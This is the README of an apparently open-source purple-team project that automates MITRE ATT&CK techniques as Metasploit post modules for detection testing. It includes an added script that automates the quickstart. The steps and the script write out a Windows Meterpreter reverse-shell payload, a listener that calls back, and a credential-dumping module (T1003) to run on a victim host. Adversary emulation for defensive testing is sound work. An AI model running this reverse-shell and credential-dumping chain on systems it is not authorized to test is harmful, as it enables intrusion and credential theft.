Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs

Purple Team ATT&CK™ Automation

At Praetorian, we were seeking a way to automatically emulate adversary tactics in order to evaluate detection and response capabilities. Our solution implements MITRE ATT&CK™ TTPs as Metasploit Framework post modules. As of this release, we've automated a little over 100 TTPs as modules.

Metasploit's advantages are its robust module library, its ability to interact with operating system APIs, and its flexible license. In addition, we can emulate the features of other tools, such as in-memory .NET execution, by leveraging Metasploit's execute_powershell functionality. This lets Blue Teams confirm that their tools alert on the actual TTP behavior rather than on execution artifacts (such as encoded PowerShell).

Our solution is built on top of the latest version of Metasploit as of 09Apr2019 (pulled from: https://github.com/rapid7/metasploit-framework). We’ve made minor modifications to Metasploit’s code base to enable some of the automation. Everything should work as intended if you’re already familiar with Metasploit. The magic happens after you establish a Meterpreter session and run a TTP as a post-exploitation module.

We're open sourcing our work because we believe in solving the cybersecurity problem. By giving Blue Teams more tools to emulate adversary behavior, we hope to improve their capabilities and reduce the still very high average dwell time.

Wiki

For detailed operational usage guidance and a full list of modules and changes, please view the GitHub Wiki.

Quickstart

Quick start video guide: https://youtu.be/o3Qb_0clIpg

Installation should follow the instructions for installing a Metasploit Docker environment: https://github.com/rapid7/metasploit-framework/tree/master/docker

In general:

  • Install Docker
  • git clone https://github.com/praetorian-code/purple-team-attack-automation.git
  • Create (or edit) ./docker-compose.local.override.yml so that LHOST is the address of your host machine, as in the example below. By default only port 4444 is forwarded into the Docker container; if you want to use other ports, for instance to mirror HTTPS on 443, you have to publish them in this file as well.
version: '3'
services:
  ms:
    environment:
      # example of setting LHOST
      LHOST: 10.0.8.2
    # example of adding more ports
    ports:
      - 8080:8080
      - 443:443
  • Add or remove ports as you see fit, and set LHOST to an IP address or hostname of the Docker host that the target can reach (not the container's internal address): the reverse_tcp stager connects back to LHOST, and Docker forwards the published port into the container.
  • Now you need to set the COMPOSE_FILE environment variable to load your local override.
echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
  • docker-compose build
  • Start the container with ./docker/bin/msfconsole
  • Generate a Meterpreter payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Attacker IP Address> LPORT=4444 -f exe > meterpreter.exe
  • Start a listener for the same payload. The handler's PAYLOAD must match what msfvenom generated; an x86 handler (windows/meterpreter/reverse_tcp) will not correctly stage the x64 executable built above:
 use exploit/multi/handler
 set PAYLOAD windows/x64/meterpreter/reverse_tcp
 set LHOST <Attacker IP Address>
 set LPORT 4444
 exploit -j -z

Copy and run meterpreter.exe on the target (“victim”) host as admin and wait for a session.

  • Run a TTP as a post-exploitation module. The full list of modules is in the GitHub Wiki. Modules are referenced by their framework path (post/..., without a leading modules/). For example, to start the 'Credential Dumping (T1003)' module, run:
use post/windows/purple/t1003
info
set SESSION 1
run
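The Quickstart steps above can be scripted into a single msfconsole resource file, so that the handler, the wait for a session and the TTP runs happen without typing them interactively. The following is an added example and is not code from the purple-team-attack-automation project or from Praetorian. It assumes the README's example LHOST (10.0.8.2), the file name purple-ttp.rc, that only t1003 is in the TTP list (extend it with further post/windows/purple/tNNNN names from the wiki), and that the file is saved under ~/.msf4 on the host, which Metasploit's docker-compose.yml mounts into the container at /home/msf/.msf4. It uses the same msfvenom payload as above, so the handler and stager match.

```rc
# purple-ttp.rc  (assumed file name; added example, not part of the project)
# Scripts the Quickstart: start the handler, wait for a Windows Meterpreter
# session, then run each listed TTP post module against it.
# Run from the repo root with (mount path assumed from Metasploit's docker-compose.yml):
#   ./docker/bin/msfconsole -r /home/msf/.msf4/purple-ttp.rc

setg LHOST 10.0.8.2
use exploit/multi/handler
# Must match the msfvenom payload exactly: an x64 stager needs the x64 handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LPORT 4444
# Inside the container LHOST is not a local address, so bind the listener to all interfaces
set ReverseListenerBindAddress 0.0.0.0
# Keep the handler alive so the same listener serves later sessions
set ExitOnSession false
exploit -j -z

<ruby>
TTPS    = %w[post/windows/purple/t1003]  # assumed list; add further TTP module paths here
TIMEOUT = 600                            # seconds to wait for the first session

# Poll the framework's session table until a Windows Meterpreter session appears
deadline = Time.now + TIMEOUT
sid = nil
while sid.nil? && Time.now < deadline
  framework.sessions.each_pair do |id, s|
    next unless s.type == 'meterpreter' && s.platform.to_s.include?('windows')
    sid = id
    break
  end
  sleep 5 if sid.nil?
end

if sid.nil?
  print_error("No Windows Meterpreter session within #{TIMEOUT}s; run meterpreter.exe on the target first")
else
  sess = framework.sessions[sid]
  # Record the context we run in: most TTPs expect an elevated (admin or SYSTEM) session
  uid = (sess.sys.config.getuid rescue 'unknown')
  elevated = (sess.sys.config.is_system? rescue false)
  print_status("Using session #{sid} (#{sess.session_host}) as #{uid}")
  print_status("WARNING: session is not SYSTEM; TTPs that need elevation will fail") unless elevated

  # Run each TTP module against the session, exactly as the interactive steps do
  TTPS.each do |mod|
    print_status("Running #{mod} against session #{sid}")
    run_single("use #{mod}")
    run_single("set SESSION #{sid}")
    run_single("run")
  end
  run_single("back")
end
</ruby>
```

The Ruby block runs inside msfconsole's console driver, so `framework`, `print_status` and `run_single` refer to the live framework instance and the console's command dispatcher; the script blocks the console while polling, which is acceptable for a scripted detection-test run. Setting ReverseListenerBindAddress explicitly avoids relying on the handler's bind fallback when LHOST is the host's address rather than the container's.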

Meterpreter Payloads

Praetorian recommends generating payloads with msfvenom from a current Metasploit nightly installer on your host, rather than from an older local install, so the stager matches the framework version running the handler.

Common Errors

ERROR: Couldn't connect to Docker daemon at http+docker://localunixsocket - is it running?

Solved by

service docker start    (or, on systemd hosts: systemctl start docker)

Future Work

  • Integrate the container into a fork of DetectionLab
  • Compare execution of CALDERA and MSF and how artifacts differ so we can improve adversary emulation
  • Leverage the MSFRPCD to facilitate automatic attack chaining

Contact

If you're interested in our Purple Team services, please contact us online or read more about "Why Praetorian Benchmarks to MITRE ATT&CK™ and Why You Should Too".

If you're an engineer looking to join our great team, we have openings at our careers page.

Contributing

See the Contribution Guide for a step-by-step guide to making a module.

Also, follow the Metasploit Framework's general contributing guidelines.

Acknowledgements

We'd like to thank various members of the security community for providing a lot of the techniques and code that we integrated into this project.

At Praetorian, the following engineers helped contribute modules:

  • Josh Abraham jabra [at] spl0it.org and @jabra
  • Abraham Adberstein
  • Tanner Harper
  • Thomas Hendrickson github.com/tomis007
  • George Jouldjian
  • Dallas Kaman
  • Blake Luther
  • Matt Schneider
  • Matthew Verrette
  • Daniel Wyleczuk-Stern @daniel_infosec